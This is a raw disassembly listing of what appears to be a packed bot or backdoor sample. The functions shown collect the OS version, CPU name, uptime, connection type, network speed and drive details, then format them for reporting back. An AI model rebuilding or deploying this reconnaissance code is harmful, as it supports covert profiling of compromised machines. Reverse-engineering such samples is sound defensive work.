; ---------------------------------------------------------------------------
loc_408540: ; CODE XREF: sub_4083AD+17C�j
; sub_4083AD+185�j
cmp [ebp+var_51C], 4
jnz short loc_40855E
cmp [ebp+var_518], 5Ah
jnz short loc_40855E
mov [ebp+var_48C], offset aMe ; "ME"
jmp short loc_4085B6
; ---------------------------------------------------------------------------
loc_40855E: ; CODE XREF: sub_4083AD+19A�j
; sub_4083AD+1A3�j
cmp [ebp+var_51C], 5
jnz short loc_40857C
cmp [ebp+var_518], 0
jnz short loc_40857C
mov [ebp+var_48C], offset a2000 ; "2000"
jmp short loc_4085B6
; ---------------------------------------------------------------------------
loc_40857C: ; CODE XREF: sub_4083AD+1B8�j
; sub_4083AD+1C1�j
cmp [ebp+var_51C], 5
jnz short loc_40859A
cmp [ebp+var_518], 1
jnz short loc_40859A
mov [ebp+var_48C], offset aXp ; "XP"
jmp short loc_4085B6
; ---------------------------------------------------------------------------
loc_40859A: ; CODE XREF: sub_4083AD+1D6�j
; sub_4083AD+1DF�j
cmp [ebp+var_51C], 5
jnz short loc_4085B6
cmp [ebp+var_518], 2
jnz short loc_4085B6
mov [ebp+var_48C], offset a2003 ; "2003"
loc_4085B6: ; CODE XREF: sub_4083AD:loc_40851D�j
; sub_4083AD+191�j ...
cmp [ebp+var_510], 2
jnz short loc_4085D6
movsx eax, [ebp+var_50C]
test eax, eax
jz short loc_4085D6
lea eax, [ebp+var_50C]
mov [ebp+var_710], eax
loc_4085D6: ; CODE XREF: sub_4083AD+210�j
; sub_4083AD+21B�j
call sub_40435B
test eax, eax
jz short loc_4085EB
mov [ebp+var_744], offset aYes ; "Yes"
jmp short loc_4085F5
; ---------------------------------------------------------------------------
loc_4085EB: ; CODE XREF: sub_4083AD+230�j
mov [ebp+var_744], offset aNo ; "No"
loc_4085F5: ; CODE XREF: sub_4083AD+23C�j
mov eax, [ebp+var_744]
mov [ebp+var_4], eax
and [ebp+var_47C], 0
and [ebp+var_409], 0
xor eax, eax
cpuid
mov [ebp+var_488], ebx
mov [ebp+var_484], edx
mov [ebp+var_480], ecx
lea eax, [ebp+var_488]
mov [ebp+var_6EC], eax
and [ebp+var_70C], 0
lea eax, [ebp+var_70C]
push eax
push 20019h
push 0
push offset aHardwareDescri ; "HARDWARE\\DESCRIPTION\\System\\CentralProc"...
push 80000002h
call ds:dword_417008 ; RegOpenKeyExA
test eax, eax
jnz short loc_4086B3
and [ebp+var_73C], 0
mov [ebp+var_740], 80h
lea eax, [ebp+var_740]
push eax
lea eax, [ebp+var_488]
push eax
lea eax, [ebp+var_73C]
push eax
push 0
push offset aProcessornames ; "ProcessorNameString"
push [ebp+var_70C]
call ds:dword_41700C ; RegQueryValueExA
test eax, eax
jnz short loc_4086A7
push 1
push 1
lea eax, [ebp+var_488]
push eax
call sub_407C2C
add esp, 0Ch
loc_4086A7: ; CODE XREF: sub_4083AD+2E5�j
push [ebp+var_70C]
call ds:dword_417028 ; RegCloseKey
loc_4086B3: ; CODE XREF: sub_4083AD+2A8�j
cmp [ebp+var_6E4], 1
jnz short loc_4086C8
mov [ebp+var_748], offset byte_41DF00
jmp short loc_4086D2
; ---------------------------------------------------------------------------
loc_4086C8: ; CODE XREF: sub_4083AD+30D�j
mov [ebp+var_748], offset dword_4191F4
loc_4086D2: ; CODE XREF: sub_4083AD+319�j
cmp [ebp+var_524], 1
jnz short loc_4086E7
mov [ebp+var_74C], offset byte_41DF00
jmp short loc_4086F1
; ---------------------------------------------------------------------------
loc_4086E7: ; CODE XREF: sub_4083AD+32C�j
mov [ebp+var_74C], offset dword_4191F4
loc_4086F1: ; CODE XREF: sub_4083AD+338�j
cmp [ebp+var_6E8], 1
jnz short loc_408706
mov [ebp+var_750], offset byte_41DF00
jmp short loc_408710
; ---------------------------------------------------------------------------
loc_408706: ; CODE XREF: sub_4083AD+34B�j
mov [ebp+var_750], offset dword_4191F4
loc_408710: ; CODE XREF: sub_4083AD+357�j
lea eax, [ebp+var_708]
push eax
lea eax, [ebp+var_6E0]
push eax
push [ebp+var_748]
push [ebp+var_6E4]
push [ebp+var_74C]
push [ebp+var_524]
push [ebp+var_750]
push [ebp+var_6E8]
push [ebp+var_4]
push [ebp+var_6F0]
push [ebp+var_738]
call sub_40821B
push eax
push [ebp+var_6EC]
push [ebp+var_514]
push [ebp+var_518]
push [ebp+var_51C]
push [ebp+var_710]
push [ebp+var_48C]
push offset dword_419104
push 400h
lea eax, [ebp+var_408]
push eax
call sub_416BAE ; _snprintf
add esp, 54h
lea eax, [ebp+var_408]
push eax
push offset dword_418B64
lea eax, [ebp+var_6C8]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_6CC]
call sub_409763
pop ecx
xor eax, eax
pop edi
pop esi
pop ebx
leave
retn 4
sub_4083AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4087C4 proc near ; CODE XREF: sub_40A9CF+1B9C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4087DE
jmp short locret_408806
; ---------------------------------------------------------------------------
loc_4087DE: ; CODE XREF: sub_4087C4+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aSysinfoThread ; "Sysinfo thread"
push 0
push [ebp+var_4]
push offset sub_4083AD
call sub_4095A4
add esp, 10h
locret_408806: ; CODE XREF: sub_4087C4+18�j
leave
retn
sub_4087C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408808 proc near ; CODE XREF: sub_408887+B�p
; sub_408887+19�p ...
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2Ch
push [ebp+arg_0]
lea eax, [ebp+var_28]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_28]
push eax
call sub_4105FB
pop ecx
call sub_416B64 ; clock
mov [ebp+var_4], eax
push 7D0h
push 0
push offset a80 ; "80"
lea eax, [ebp+var_28]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_8], eax
push [ebp+var_8]
call sub_4053B1
pop ecx
cmp [ebp+var_8], 0
jnz short loc_40885F
mov eax, 3E8h
jmp short locret_408885
; ---------------------------------------------------------------------------
loc_40885F: ; CODE XREF: sub_408808+4E�j
call sub_416B64 ; clock
sub eax, [ebp+var_4]
cmp eax, 3E8h
jnb short loc_40887B
call sub_416B64 ; clock
sub eax, [ebp+var_4]
mov [ebp+var_2C], eax
jmp short loc_408882
; ---------------------------------------------------------------------------
loc_40887B: ; CODE XREF: sub_408808+64�j
mov [ebp+var_2C], 3E8h
loc_408882: ; CODE XREF: sub_408808+71�j
mov eax, [ebp+var_2C]
locret_408885: ; CODE XREF: sub_408808+55�j
leave
retn
sub_408808 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408887 proc near ; CODE XREF: sub_408B30+1C2�p
; sub_40CA29+1E9�p ...
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
push offset dword_418F60
call sub_408808
pop ecx
mov [ebp+var_4], eax
push offset dword_418F6C
call sub_408808
pop ecx
mov [ebp+var_8], eax
push offset dword_418F84
call sub_408808
pop ecx
mov [ebp+var_C], eax
push offset dword_418F90
call sub_408808
pop ecx
mov [ebp+var_10], eax
push offset dword_418FA0
call sub_408808
pop ecx
mov [ebp+var_14], eax
push offset dword_418FB0
call sub_408808
pop ecx
mov [ebp+var_18], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
add eax, [ebp+var_C]
add eax, [ebp+var_10]
add eax, [ebp+var_14]
add eax, [ebp+var_18]
xor edx, edx
push 6
pop ecx
div ecx
leave
retn
sub_408887 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4088FC proc near ; CODE XREF: sub_408B30:loc_408D33�p
var_438 = qword ptr -438h
var_430 = dword ptr -430h
var_42C = qword ptr -42Ch
var_424 = dword ptr -424h
var_420 = dword ptr -420h
var_41C = dword ptr -41Ch
var_418 = byte ptr -418h
var_318 = dword ptr -318h
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_30C = dword ptr -30Ch
var_308 = byte ptr -308h
var_208 = byte ptr -208h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 438h
and [ebp+var_8], 0
jmp short loc_408912
; ---------------------------------------------------------------------------
loc_40890B: ; CODE XREF: sub_4088FC+23�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_408912: ; CODE XREF: sub_4088FC+D�j
mov eax, [ebp+var_8]
cmp ds:off_418FC4[eax*4], 0
jz short loc_408921
jmp short loc_40890B
; ---------------------------------------------------------------------------
loc_408921: ; CODE XREF: sub_4088FC+21�j
mov eax, [ebp+var_8]
shr eax, 1
mov [ebp+var_8], eax
and [ebp+var_4], 0
jmp short loc_408936
; ---------------------------------------------------------------------------
loc_40892F: ; CODE XREF: sub_4088FC+D6�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_408936: ; CODE XREF: sub_4088FC+31�j
cmp [ebp+var_4], 3
jnb loc_408B2C
mov eax, [ebp+var_8]
dec eax
push eax
push 0
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_318], eax
mov eax, [ebp+var_318]
shl eax, 1
push ds:off_418FC4[eax*4]
lea eax, [ebp+var_418]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_418]
push eax
call sub_4105FB
pop ecx
mov eax, [ebp+var_318]
shl eax, 1
push ds:off_418FC8[eax*4]
lea eax, [ebp+var_308]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_308]
push eax
call sub_4105FB
pop ecx
push 2710h
push 0
push offset a80 ; "80"
lea eax, [ebp+var_418]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_310], eax
cmp [ebp+var_310], 0
jnz short loc_4089D7
jmp loc_40892F
; ---------------------------------------------------------------------------
loc_4089D7: ; CODE XREF: sub_4088FC+D4�j
lea eax, [ebp+var_418]
push eax
lea eax, [ebp+var_308]
push eax
push offset aGetSHttp1_0Hos ; "GET /%s HTTP/1.0\r\nHost: %s\r\n\r\n"
push 200h
lea eax, [ebp+var_208]
push eax
call sub_416BAE ; _snprintf
add esp, 14h
lea eax, [ebp+var_208]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_208]
push eax
push [ebp+var_310]
call sub_4053BF
add esp, 0Ch
and [ebp+var_314], 0
call sub_416B64 ; clock
mov [ebp+var_41C], eax
and [ebp+var_30C], 0
loc_408A3A: ; CODE XREF: sub_4088FC+1AF�j
; sub_4088FC+22B�j
push 1388h
push 200h
lea eax, [ebp+var_208]
push eax
push [ebp+var_310]
call sub_405443
add esp, 10h
mov [ebp+var_420], eax
cmp [ebp+var_420], 0
jz short loc_408A93
cmp [ebp+var_420], 0FFFFFFFFh
jz short loc_408A93
call sub_416B64 ; clock
sub eax, [ebp+var_41C]
cmp eax, 1388h
jnb short loc_408A93
cmp [ebp+var_30C], 100000h
jb loc_408B15
loc_408A93: ; CODE XREF: sub_4088FC+16A�j
; sub_4088FC+173�j ...
cmp [ebp+var_30C], 2000h
jnb short loc_408AAD
push [ebp+var_310]
call sub_40538D
pop ecx
jmp short loc_408A3A
; ---------------------------------------------------------------------------
loc_408AAD: ; CODE XREF: sub_4088FC+1A1�j
mov eax, [ebp+var_30C]
mov dword ptr [ebp+var_42C], eax
and dword ptr [ebp+var_42C+4], 0
fild [ebp+var_42C]
fstp [ebp+var_430]
call sub_416B64 ; clock
sub eax, [ebp+var_41C]
mov dword ptr [ebp+var_438], eax
and dword ptr [ebp+var_438+4], 0
fild [ebp+var_438]
fdiv ds:flt_417270
fdivr [ebp+var_430]
call sub_416CF8 ; _ftol
mov [ebp+var_424], eax
push [ebp+var_310]
call sub_40538D
pop ecx
mov eax, [ebp+var_424]
jmp short locret_408B2E
; ---------------------------------------------------------------------------
loc_408B15: ; CODE XREF: sub_4088FC+191�j
mov eax, [ebp+var_30C]
add eax, [ebp+var_420]
mov [ebp+var_30C], eax
jmp loc_408A3A
; ---------------------------------------------------------------------------
loc_408B2C: ; CODE XREF: sub_4088FC+3E�j
xor eax, eax
locret_408B2E: ; CODE XREF: sub_4088FC+217�j
leave
retn
sub_4088FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408B30 proc near ; DATA XREF: sub_408E4A+35�o
var_A9C = qword ptr -0A9Ch
var_A7C = qword ptr -0A7Ch
var_A74 = dword ptr -0A74h
var_A70 = dword ptr -0A70h
var_A6C = dword ptr -0A6Ch
var_A68 = dword ptr -0A68h
var_A64 = dword ptr -0A64h
var_A60 = dword ptr -0A60h
var_A5C = byte ptr -0A5Ch
var_8B8 = dword ptr -8B8h
var_8B4 = dword ptr -8B4h
var_8B0 = byte ptr -8B0h
var_830 = dword ptr -830h
var_82C = dword ptr -82Ch
var_828 = dword ptr -828h
var_824 = dword ptr -824h
var_820 = dword ptr -820h
var_81C = dword ptr -81Ch
var_818 = dword ptr -818h
var_814 = byte ptr -814h
var_414 = byte ptr -414h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A7Ch
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_A60]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push offset dword_41F018
lea eax, [ebp+var_414]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_824]
push eax
push 0
push 0
push offset dword_41F018
call ds:dword_41DF54 ; getaddrinfo
test eax, eax
jnz short loc_408BBC
push 1
push 0
push 0
push 401h
lea eax, [ebp+var_414]
push eax
mov eax, [ebp+var_824]
push dword ptr [eax+10h]
mov eax, [ebp+var_824]
push dword ptr [eax+18h]
call ds:dword_41DF58 ; getnameinfo
push [ebp+var_824]
call ds:dword_41DF5C ; freeaddrinfo
loc_408BBC: ; CODE XREF: sub_408B30+54�j
call sub_409318
mov [ebp+var_8B8], eax
mov eax, [ebp+var_8B8]
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_830], eax
mov eax, [ebp+var_8B8]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov [ebp+var_820], eax
mov eax, [ebp+var_8B8]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov eax, edx
xor edx, edx
push 3Ch
pop ecx
div ecx
mov [ebp+var_82C], eax
push offset aUnknown_0 ; "Unknown"
lea eax, [ebp+var_8B0]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push offset aUnknown_0 ; "Unknown"
lea eax, [ebp+var_10]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
cmp ds:dword_41DF4C, 0
jz short loc_408C9F
push 0
push 80h
lea eax, [ebp+var_8B0]
push eax
lea eax, [ebp+var_818]
push eax
call ds:dword_41DF4C ; InternetGetConnectedStateEx
test eax, eax
jz short loc_408C9F
mov eax, [ebp+var_818]
and eax, 1
test eax, eax
jz short loc_408C8F
push offset aModem ; "Modem"
lea eax, [ebp+var_10]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_408C9F
; ---------------------------------------------------------------------------
loc_408C8F: ; CODE XREF: sub_408B30+14B�j
push offset aLan ; "LAN"
lea eax, [ebp+var_10]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_408C9F: ; CODE XREF: sub_408B30+11F�j
; sub_408B30+13E�j ...
call sub_4043E9
test eax, eax
jz short loc_408CB4
mov [ebp+var_A64], offset aYes ; "Yes"
jmp short loc_408CBE
; ---------------------------------------------------------------------------
loc_408CB4: ; CODE XREF: sub_408B30+176�j
mov [ebp+var_A64], offset aNo ; "No"
loc_408CBE: ; CODE XREF: sub_408B30+182�j
mov eax, [ebp+var_A64]
mov [ebp+var_8], eax
call sub_404279
test eax, eax
jz short loc_408CDC
mov [ebp+var_A68], offset aYes ; "Yes"
jmp short loc_408CE6
; ---------------------------------------------------------------------------
loc_408CDC: ; CODE XREF: sub_408B30+19E�j
mov [ebp+var_A68], offset aNo ; "No"
loc_408CE6: ; CODE XREF: sub_408B30+1AA�j
mov eax, [ebp+var_A68]
mov [ebp+var_8B4], eax
call sub_408887
mov [ebp+var_828], eax
mov [ebp+var_81C], offset aBad ; "Bad"
cmp [ebp+var_828], 2EEh
jnb short loc_408D1D
mov [ebp+var_81C], offset aAvarage ; "Avarage"
loc_408D1D: ; CODE XREF: sub_408B30+1E1�j
cmp [ebp+var_828], 1F4h
jnb short loc_408D33
mov [ebp+var_81C], offset aGood ; "Good"
loc_408D33: ; CODE XREF: sub_408B30+1F7�j
call sub_4088FC
mov [ebp+var_4], eax
cmp [ebp+var_82C], 1
jnz short loc_408D50
mov [ebp+var_A6C], offset byte_41DF00
jmp short loc_408D5A
; ---------------------------------------------------------------------------
loc_408D50: ; CODE XREF: sub_408B30+212�j
mov [ebp+var_A6C], offset dword_4191F4
loc_408D5A: ; CODE XREF: sub_408B30+21E�j
cmp [ebp+var_820], 1
jnz short loc_408D6F
mov [ebp+var_A70], offset byte_41DF00
jmp short loc_408D79
; ---------------------------------------------------------------------------
loc_408D6F: ; CODE XREF: sub_408B30+231�j
mov [ebp+var_A70], offset dword_4191F4
loc_408D79: ; CODE XREF: sub_408B30+23D�j
cmp [ebp+var_830], 1
jnz short loc_408D8E
mov [ebp+var_A74], offset byte_41DF00
jmp short loc_408D98
; ---------------------------------------------------------------------------
loc_408D8E: ; CODE XREF: sub_408B30+250�j
mov [ebp+var_A74], offset dword_4191F4
loc_408D98: ; CODE XREF: sub_408B30+25C�j
push [ebp+var_A6C]
push [ebp+var_82C]
push [ebp+var_A70]
push [ebp+var_820]
push [ebp+var_A74]
push [ebp+var_830]
mov eax, [ebp+var_4]
mov dword ptr [ebp+var_A7C], eax
and dword ptr [ebp+var_A7C+4], 0
fild [ebp+var_A7C]
fdiv ds:flt_417274
push ecx
push ecx
fstp [esp+0A9Ch+var_A9C]
push [ebp+var_828]
push [ebp+var_81C]
push [ebp+var_8B4]
push [ebp+var_8]
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8B0]
push eax
lea eax, [ebp+var_414]
push eax
push offset dword_419284
push 400h
lea eax, [ebp+var_814]
push eax
call sub_416BAE ; _snprintf
add esp, 48h
lea eax, [ebp+var_814]
push eax
push offset dword_418B64
lea eax, [ebp+var_A5C]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_A60]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_408B30 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408E4A proc near ; CODE XREF: sub_40A9CF+1BD8�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_408E64
jmp short locret_408E8C
; ---------------------------------------------------------------------------
loc_408E64: ; CODE XREF: sub_408E4A+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aNetinfoThread ; "Netinfo thread"
push 0
push [ebp+var_4]
push offset sub_408B30
call sub_4095A4
add esp, 10h
locret_408E8C: ; CODE XREF: sub_408E4A+18�j
leave
retn
sub_408E4A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408E8E proc near ; CODE XREF: sub_40CA29+1C5�p
; sub_40CA29+2DA�p ...
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
push ebp
mov ebp, esp
sub esp, 24h
mov eax, ds:dword_419398
mov [ebp+var_1C], eax
and [ebp+var_10], 0
and [ebp+var_C], 0
loc_408EA4: ; CODE XREF: sub_408E8E+95�j
lea eax, [ebp+var_1C]
push eax
call ds:dword_4170CC ; GetDriveTypeA
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_408F14
cmp [ebp+var_10], 1
jz short loc_408F14
cmp [ebp+var_10], 5
jz short loc_408EE1
cmp [ebp+var_10], 2
jz short loc_408EE1
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_1C]
push eax
call ds:dword_4170C8 ; GetDiskFreeSpaceExA
jmp short loc_408EF1
; ---------------------------------------------------------------------------
loc_408EE1: ; CODE XREF: sub_408E8E+33�j
; sub_408E8E+39�j
push 8
push 0
lea eax, [ebp+var_24]
push eax
call sub_416B6A ; memset
add esp, 0Ch
loc_408EF1: ; CODE XREF: sub_408E8E+51�j
push 0
push 100000h
push [ebp+var_20]
push [ebp+var_24]
call sub_416C90
mov [ebp+var_24], eax
mov [ebp+var_20], edx
mov eax, [ebp+var_24]
mov ecx, [ebp+var_C]
add ecx, eax
mov [ebp+var_C], ecx
loc_408F14: ; CODE XREF: sub_408E8E+27�j
; sub_408E8E+2D�j
mov al, byte ptr [ebp+var_1C]
add al, 1
mov byte ptr [ebp+var_1C], al
movsx eax, byte ptr [ebp+var_1C]
cmp eax, 5Ah
jnz loc_408EA4
mov eax, [ebp+var_C]
leave
retn
sub_408E8E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408F2E proc near ; DATA XREF: sub_4091E2+35�o
var_5DC = dword ptr -5DCh
var_5D8 = dword ptr -5D8h
var_5D4 = dword ptr -5D4h
var_5D0 = byte ptr -5D0h
var_42C = dword ptr -42Ch
var_428 = dword ptr -428h
var_424 = dword ptr -424h
var_420 = byte ptr -420h
var_418 = dword ptr -418h
var_414 = dword ptr -414h
var_410 = dword ptr -410h
var_40C = byte ptr -40Ch
var_404 = byte ptr -404h
var_3EF = byte ptr -3EFh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5DCh
push esi
push edi
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_5D4]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 5
pop ecx
mov esi, offset aDriveInformati ; "Drive information - "
lea edi, [ebp+var_404]
rep movsd
movsb
mov ecx, 0FAh
xor eax, eax
lea edi, [ebp+var_3EF]
rep stosd
stosw
stosb
mov eax, ds:dword_419398
mov [ebp+var_424], eax
and [ebp+var_418], 0
and [ebp+var_5D8], 0
and [ebp+var_414], 0
mov [ebp+var_410], 1
loc_408FA6: ; CODE XREF: sub_408F2E+23B�j
lea eax, [ebp+var_424]
push eax
call ds:dword_4170CC ; GetDriveTypeA
mov [ebp+var_5DC], eax
cmp [ebp+var_5DC], 0
jz loc_409151
cmp [ebp+var_5DC], 1
jz loc_409151
cmp [ebp+var_5DC], 2
jnz short loc_408FE5
mov [ebp+var_4], offset aRemovable ; "removable"
jmp short loc_409034
; ---------------------------------------------------------------------------
loc_408FE5: ; CODE XREF: sub_408F2E+AC�j
cmp [ebp+var_5DC], 3
jnz short loc_408FF7
mov [ebp+var_4], offset aFixed ; "fixed"
jmp short loc_409034
; ---------------------------------------------------------------------------
loc_408FF7: ; CODE XREF: sub_408F2E+BE�j
cmp [ebp+var_5DC], 4
jnz short loc_409009
mov [ebp+var_4], offset aRemote ; "remote"
jmp short loc_409034
; ---------------------------------------------------------------------------
loc_409009: ; CODE XREF: sub_408F2E+D0�j
cmp [ebp+var_5DC], 5
jnz short loc_40901B
mov [ebp+var_4], offset aCdRom ; "cd-rom"
jmp short loc_409034
; ---------------------------------------------------------------------------
loc_40901B: ; CODE XREF: sub_408F2E+E2�j
cmp [ebp+var_5DC], 6
jnz short loc_40902D
mov [ebp+var_4], offset aRamdisk ; "ramdisk"
jmp short loc_409034
; ---------------------------------------------------------------------------
loc_40902D: ; CODE XREF: sub_408F2E+F4�j
mov [ebp+var_4], offset aUnknown ; "unknown"
loc_409034: ; CODE XREF: sub_408F2E+B5�j
; sub_408F2E+C7�j ...
cmp [ebp+var_5DC], 5
jz short loc_40906A
cmp [ebp+var_5DC], 2
jz short loc_40906A
lea eax, [ebp+var_42C]
push eax
lea eax, [ebp+var_420]
push eax
lea eax, [ebp+var_40C]
push eax
lea eax, [ebp+var_424]
push eax
call ds:dword_4170C8 ; GetDiskFreeSpaceExA
jmp short loc_40907D
; ---------------------------------------------------------------------------
loc_40906A: ; CODE XREF: sub_408F2E+10D�j
; sub_408F2E+116�j
push 8
push 0
lea eax, [ebp+var_42C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
loc_40907D: ; CODE XREF: sub_408F2E+13A�j
push 0
push 100000h
push [ebp+var_428]
push [ebp+var_42C]
call sub_416C90
mov [ebp+var_42C], eax
mov [ebp+var_428], edx
cmp [ebp+var_410], 0
jnz short loc_4090BF
push offset dword_419404
lea eax, [ebp+var_404]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
jmp short loc_4090C6
; ---------------------------------------------------------------------------
loc_4090BF: ; CODE XREF: sub_408F2E+17A�j
and [ebp+var_410], 0
loc_4090C6: ; CODE XREF: sub_408F2E+18F�j
mov eax, [ebp+var_42C]
or eax, [ebp+var_428]
test eax, eax
jz short loc_40910A
push [ebp+var_428]
push [ebp+var_42C]
push [ebp+var_4]
lea eax, [ebp+var_424]
push eax
lea eax, [ebp+var_404]
push eax
push offset dword_4193E4
lea eax, [ebp+var_404]
push eax
call ds:dword_4171E0 ; wsprintfA
add esp, 1Ch
jmp short loc_409130
; ---------------------------------------------------------------------------
loc_40910A: ; CODE XREF: sub_408F2E+1A6�j
push [ebp+var_4]
lea eax, [ebp+var_424]
push eax
lea eax, [ebp+var_404]
push eax
push offset dword_4193D4
lea eax, [ebp+var_404]
push eax
call ds:dword_4171E0 ; wsprintfA
add esp, 14h
loc_409130: ; CODE XREF: sub_408F2E+1DA�j
mov eax, [ebp+var_42C]
mov ecx, [ebp+var_414]
add ecx, eax
mov [ebp+var_414], ecx
mov eax, [ebp+var_5D8]
inc eax
mov [ebp+var_5D8], eax
loc_409151: ; CODE XREF: sub_408F2E+92�j
; sub_408F2E+9F�j
mov al, byte ptr [ebp+var_424]
add al, 1
mov byte ptr [ebp+var_424], al
movsx eax, byte ptr [ebp+var_424]
cmp eax, 5Ah
jnz loc_408FA6
cmp [ebp+var_5D8], 0
jz short loc_40918B
push offset dword_419404
lea eax, [ebp+var_404]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
loc_40918B: ; CODE XREF: sub_408F2E+248�j
push [ebp+var_414]
push [ebp+var_5D8]
lea eax, [ebp+var_404]
push eax
push offset dword_41939C
lea eax, [ebp+var_404]
push eax
call ds:dword_4171E0 ; wsprintfA
add esp, 14h
lea eax, [ebp+var_404]
push eax
push offset dword_418B64
lea eax, [ebp+var_5D0]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_5D4]
call sub_409763
pop ecx
xor eax, eax
pop edi
pop esi
leave
retn 4
sub_408F2E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4091E2 proc near ; CODE XREF: sub_40A9CF+1C61�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4091FC
jmp short locret_409224
; ---------------------------------------------------------------------------
loc_4091FC: ; CODE XREF: sub_4091E2+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aDriveinfoThrea ; "Driveinfo thread"
push 0
push [ebp+var_4]
push offset sub_408F2E
call sub_4095A4
add esp, 10h
locret_409224: ; CODE XREF: sub_4091E2+18�j
leave
retn
sub_4091E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409226 proc near ; CODE XREF: UPX0:00416A06�p
var_20 = qword ptr -20h
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
lea eax, [ebp+var_8]
push eax
call ds:dword_4170D8 ; QueryPerformanceCounter
lea eax, [ebp+var_10]
push eax
call ds:dword_4170D4 ; QueryPerformanceFrequency
cmp [ebp+var_4], 0
jl short loc_40928E
jg short loc_40924E
cmp [ebp+var_8], 0
jbe short loc_40928E
loc_40924E: ; CODE XREF: sub_409226+20�j
cmp [ebp+var_C], 0
jl short loc_40928E
jg short loc_40925C
cmp [ebp+var_10], 0
jbe short loc_40928E
loc_40925C: ; CODE XREF: sub_409226+2E�j
push [ebp+var_C]
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_8]
call sub_416D10
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], edx
fild [ebp+var_18]
push ecx
push ecx
fstp [esp+20h+var_20]
call sub_416CFE ; ceil
pop ecx
pop ecx
call sub_416CF8 ; _ftol
mov ds:dword_41E3A0, eax
